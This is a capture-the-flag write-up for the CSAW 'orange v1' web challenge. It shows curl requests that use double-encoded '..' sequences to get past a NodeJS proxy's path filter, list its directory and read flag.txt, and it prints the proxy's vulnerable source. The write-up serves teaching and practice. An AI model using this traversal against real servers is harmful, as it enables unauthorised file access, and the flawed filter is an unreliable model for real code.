[Web] CSAW - orange v1

orange v1

I wrote a little proxy program in NodeJS for my poems folder.

Everyone wants to read flag.txt but I like it too much to share.

http://web.chal.csaw.io:7311/?path=orange.txt

We don’t have much here, its just a GET parameter, after a bunch of tries we realized that “..” characters are banned, so lets try with double encoding:

$ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/'
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /poems/../</title>
<body>
<h2>Directory listing for /poems/../</h2>
<hr>
<ul>
<li><a href=".dockerignore">.dockerignore</a>
<li><a href="back.py">back.py</a>
<li><a href="flag.txt">flag.txt</a>
<li><a href="poems/">poems/</a>
<li><a href="serve.sh">serve.sh</a>
<li><a href="server.js">server.js</a>
</ul>
<hr>
</body>
</html>

And there it is the flag!

$ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt'
flag{thank_you_based_orange_for_this_ctf_challenge}

Since we could leak the source code here ill post it:

var http = require('http');
var fs = require('fs');
var url = require('url');

var server = http.createServer(function(req, res) {
    try {
        var path = url.parse(req.url, true).query;
        path = path['path'];
        if (path.indexOf("..") == -1 && path.indexOf("ＮＮ") == -1) {
            var base = "http://localhost:8080/poems/";
            var callback = function(response){
                var str = '';
                response.on('data', function (chunk) {
                    str += chunk;
                });
                response.on('end', function () {
                  res.end(str);
                });
            }
            http.get(base + path, callback).end();
        } else {
            res.writeHead(403);
            res.end("WHOA THATS BANNED!!!!");
        }
    }
    catch (e) {
        res.writeHead(404);
        res.end('Oops');
    }
});